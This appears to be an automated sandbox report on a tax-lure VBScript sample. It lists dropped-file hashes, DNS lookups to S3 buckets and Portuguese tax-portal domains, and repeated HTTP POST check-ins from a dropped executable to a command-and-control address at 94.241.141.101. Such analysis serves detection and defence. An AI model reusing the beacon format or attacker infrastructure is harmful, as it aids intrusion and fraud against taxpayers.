                                                                                                                SHA-512:A34FCB9003AE5024320BC84884B026AFE8CDA0629FF0F0FC226F63ED44FC45C8F3AB4052714B35B49027D2DABC29721F960DA8FBA055BBF814EAAAE647B1726D
                                                                                                                Malicious:false
                                                                                                                Preview:(function(e,t){"use strict";function n(e){var t=Array.prototype.slice.call(arguments,1);return e.prop?e.prop.apply(e,t):e.attr.apply(e,t)}function s(e,t,n){var s,a;for(s in n)n.hasOwnProperty(s)&&(a=s.replace(/ |$/g,t.eventNamespace),e.bind(a,n[s]))}function a(e,t,n){s(e,n,{focus:function(){t.addClass(n.focusClass)},blur:function(){t.removeClass(n.focusClass),t.removeClass(n.activeClass)},mouseenter:function(){t.addClass(n.hoverClass)},mouseleave:function(){t.removeClass(n.hoverClass),t.removeClass(n.activeClass)},"mousedown touchbegin":function(){e.is(":disabled")||t.addClass(n.activeClass)},"mouseup touchend":function(){t.removeClass(n.activeClass)}})}function i(e,t){e.removeClass(t.hoverClass+" "+t.focusClass+" "+t.activeClass)}function r(e,t,n){n?e.addClass(t):e.removeClass(t)}function l(e,t,n){var s="checked",a=t.is(":"+s);t.prop?t.prop(s,a):a?t.attr(s,s):t.removeAttr(s),r(e,n.checkedClass,a)}function u(e,t,n){r(e,n.disabledClass,t.is(":disabled"))}function o(e,t,n){switch(n){case

                                                                                                                Chrome Cache Entry: 99

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (32086), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):95790
                                                                                                                Entropy (8bit):5.394132126458497
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:EPEkjP+iADIOr/NEe876nmBu3HvF38sEeL8FoqqhJ7SerN5wVI+xcBpPv7E+nzmN:bNMzqhJvN32cBd7M6Whca98Hr4
                                                                                                                MD5:4DC834D16A0D219D5C2B8A5B814569E4
                                                                                                                SHA1:4FBE0563917D6F6289E4E1B4A0A8758E4E43BDA9
                                                                                                                SHA-256:91222F96F34735EBC88DF208017E54D4329B9202E3E52367FB8B149698A1A5EF
                                                                                                                SHA-512:6FBEC4785A21520FA623D1A151C6C8B64BAA1321AC6918A127BCFC22E49EC2E3BCD161AF9C237BD5C70BC4046EB12CF434563F86CBDC9876EB67FB2DEA87034B
                                                                                                                Malicious:false
                                                                                                                Preview:/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */..!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){re

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:ASCII text, with very long lines (1026), with CRLF line terminators
                                                                                                                Entropy (8bit):5.484805521965355
                                                                                                                TrID:
                                                                                                                  File name:guia_luqf.vbs
                                                                                                                  File size:4'092'491 bytes
                                                                                                                  MD5:3163a6526f07d203061a91ff6e7236c7
                                                                                                                  SHA1:4561ad4c5e704553b187f6e49218f234a50f157d
                                                                                                                  SHA256:0799f38e9829f8d7c0926dcf77dc1e1ecb959e209edb9a7320e6bfd331d7e0ad
                                                                                                                  SHA512:03ded39d856d576fdc9dee68d476f8ee5a34da35b51beb865a543c56e70c0c336aa304389f4c499e7edfb5faa66fc66e96c2f90967f3719023026d48b84bf131
                                                                                                                  SSDEEP:49152:6R/vT1vAcvA7LvGvbv3TvOv1/vXvkvzOvbv1vlvSvgvNvHZvWnvxPKuwmvw:qnxPSizbq9/IWz1Fe0tJAnw
                                                                                                                  TLSH:8C16D7993681F07102D32166A0FF2D09FE3D1921590D9C54EE62D7C93C2994AA27FEFE
                                                                                                                  File Content Preview:'){var o=e[r];'..'){var i=r[n],o=i.func;'..');'..'var l=function(){var e=(0,t.getDocumentReferrer)(),r,n;'..');'..',siblingsMatchingSameSelector:function(n,o){var a=[];'..'){var v=e[d=u[f]],h=t[d],g=n?n(i?h:v,i?v:h,d):void 0;'..';'..'++i<o;'..'}'..',heap)

                                                                                                                  File Icon

                                                                                                                  Icon Hash:68d69b8f86ab9a86

                                                                                                                  Network Behavior

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Nov 14, 2024 14:59:48.242217064 CET192.168.2.41.1.1.10x57eaStandard query (0)privacidadeepreferenciapt.s3.eu-north-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:49.484968901 CET192.168.2.41.1.1.10x7b9dStandard query (0)www.acesso.gov.ptA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:49.485121012 CET192.168.2.41.1.1.10x3d56Standard query (0)www.acesso.gov.pt65IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:51.710818052 CET192.168.2.41.1.1.10xf816Standard query (0)static.portaldasfinancas.gov.ptA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:51.710972071 CET192.168.2.41.1.1.10x4d6fStandard query (0)static.portaldasfinancas.gov.pt65IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.321265936 CET192.168.2.41.1.1.10x5a87Standard query (0)static.portaldasfinancas.gov.ptA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.321620941 CET192.168.2.41.1.1.10x7277Standard query (0)static.portaldasfinancas.gov.pt65IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.849481106 CET192.168.2.41.1.1.10x4380Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.849679947 CET192.168.2.41.1.1.10xc77eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:54.202958107 CET192.168.2.41.1.1.10xa808Standard query (0)www.portaldasfinancas.gov.ptA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:54.203071117 CET192.168.2.41.1.1.10x31a1Standard query (0)www.portaldasfinancas.gov.pt65IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:54.284003019 CET192.168.2.41.1.1.10xdcdaStandard query (0)www.acesso.gov.ptA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:54.284329891 CET192.168.2.41.1.1.10xf4b7Standard query (0)www.acesso.gov.pt65IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:00:13.185830116 CET192.168.2.41.1.1.10x328bStandard query (0)happychristmaslegado.s3.eu-north-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:00:42.488533974 CET192.168.2.41.1.1.10x8584Standard query (0)happychristmaslegado.s3.eu-north-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:00:49.731833935 CET192.168.2.41.1.1.10xb520Standard query (0)s3.timeweb.comA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:01:02.456974983 CET192.168.2.41.1.1.10x1198Standard query (0)s3.timeweb.comA (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:01:32.739669085 CET192.168.2.41.1.1.10xfec5Standard query (0)s3.timeweb.comA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Nov 14, 2024 14:59:48.262023926 CET1.1.1.1192.168.2.40x57eaNo error (0)privacidadeepreferenciapt.s3.eu-north-1.amazonaws.coms3-r-w.eu-north-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:48.262023926 CET1.1.1.1192.168.2.40x57eaNo error (0)s3-r-w.eu-north-1.amazonaws.com16.12.9.14A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:48.262023926 CET1.1.1.1192.168.2.40x57eaNo error (0)s3-r-w.eu-north-1.amazonaws.com3.5.218.52A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:49.629348993 CET1.1.1.1192.168.2.40x7b9dNo error (0)www.acesso.gov.pt62.28.254.215A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:52.017858028 CET1.1.1.1192.168.2.40xf816No error (0)static.portaldasfinancas.gov.ptstaticpf.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:52.017858028 CET1.1.1.1192.168.2.40xf816No error (0)scdn3.wpc.84635.rhocdn.netsni1gl.wpc.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:52.017858028 CET1.1.1.1192.168.2.40xf816No error (0)sni1gl.wpc.rhocdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:52.026840925 CET1.1.1.1192.168.2.40x4d6fNo error (0)static.portaldasfinancas.gov.ptstaticpf.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:52.026840925 CET1.1.1.1192.168.2.40x4d6fNo error (0)scdn3.wpc.84635.rhocdn.netsni1gl.wpc.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.432051897 CET1.1.1.1192.168.2.40x5a87No error (0)static.portaldasfinancas.gov.ptstaticpf.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.432051897 CET1.1.1.1192.168.2.40x5a87No error (0)scdn3.wpc.84635.rhocdn.netsni1gl.wpc.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.432051897 CET1.1.1.1192.168.2.40x5a87No error (0)sni1gl.wpc.rhocdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.439204931 CET1.1.1.1192.168.2.40x7277No error (0)static.portaldasfinancas.gov.ptstaticpf.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.439204931 CET1.1.1.1192.168.2.40x7277No error (0)scdn3.wpc.84635.rhocdn.netsni1gl.wpc.rhocdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.856410980 CET1.1.1.1192.168.2.40xc77eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:53.856575012 CET1.1.1.1192.168.2.40x4380No error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:54.211344004 CET1.1.1.1192.168.2.40xa808No error (0)www.portaldasfinancas.gov.pt62.28.254.212A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 14:59:54.339667082 CET1.1.1.1192.168.2.40xdcdaNo error (0)www.acesso.gov.pt62.28.254.215A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:00:13.196748972 CET1.1.1.1192.168.2.40x328bNo error (0)happychristmaslegado.s3.eu-north-1.amazonaws.coms3-r-w.eu-north-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:00:13.196748972 CET1.1.1.1192.168.2.40x328bNo error (0)s3-r-w.eu-north-1.amazonaws.com16.12.9.46A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:00:13.196748972 CET1.1.1.1192.168.2.40x328bNo error (0)s3-r-w.eu-north-1.amazonaws.com3.5.217.57A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:00:42.513015985 CET1.1.1.1192.168.2.40x8584No error (0)happychristmaslegado.s3.eu-north-1.amazonaws.coms3-r-w.eu-north-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:00:42.513015985 CET1.1.1.1192.168.2.40x8584No error (0)s3-r-w.eu-north-1.amazonaws.com16.12.9.10A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:00:42.513015985 CET1.1.1.1192.168.2.40x8584No error (0)s3-r-w.eu-north-1.amazonaws.com3.5.216.50A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:00:49.740061045 CET1.1.1.1192.168.2.40xb520No error (0)s3.timeweb.com92.53.116.138A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:01:02.464973927 CET1.1.1.1192.168.2.40x1198No error (0)s3.timeweb.com92.53.116.138A (IP address)IN (0x0001)false
                                                                                                                  Nov 14, 2024 15:01:32.881056070 CET1.1.1.1192.168.2.40xfec5No error (0)s3.timeweb.com92.53.116.138A (IP address)IN (0x0001)false

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.44979094.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:37.491535902 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:37.496640921 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:38.395720005 CET175INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:38 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 9
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Data Raw: 42 44 20 43 52 45 41 54 45
                                                                                                                  Data Ascii: BD CREATE


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.44979194.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:38.514153957 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:38.519058943 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:39.420476913 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:39 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.44979294.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:39.547086954 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:39.552305937 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:40.432455063 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:40 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.44979394.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:40.693531990 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:40.698432922 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:41.583920956 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:41 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.44979494.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:41.703129053 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:41.708165884 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:42.625482082 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:42 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.44979594.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:42.750078917 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:42.755367994 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:43.643188000 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:43 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.44979794.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:43.769917011 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:43.777432919 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:44.662372112 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:44 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.44979994.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:44.780802965 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:44.785783052 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:45.697779894 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:45 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.44980594.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:45.812935114 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:45.818394899 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:46.724915981 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.44981094.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:46.843168974 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:46.848722935 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:47.720372915 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:47 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.44981694.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:47.892995119 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:47.902106047 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:48.743736982 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:48 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.44982294.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:48.637190104 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:48.643723965 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:49.703496933 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  12192.168.2.44982394.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:48.858036041 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:48.863378048 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:49.754165888 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:49 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  13192.168.2.44983194.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:49.875147104 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:49.882365942 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:50.781883001 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:50 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


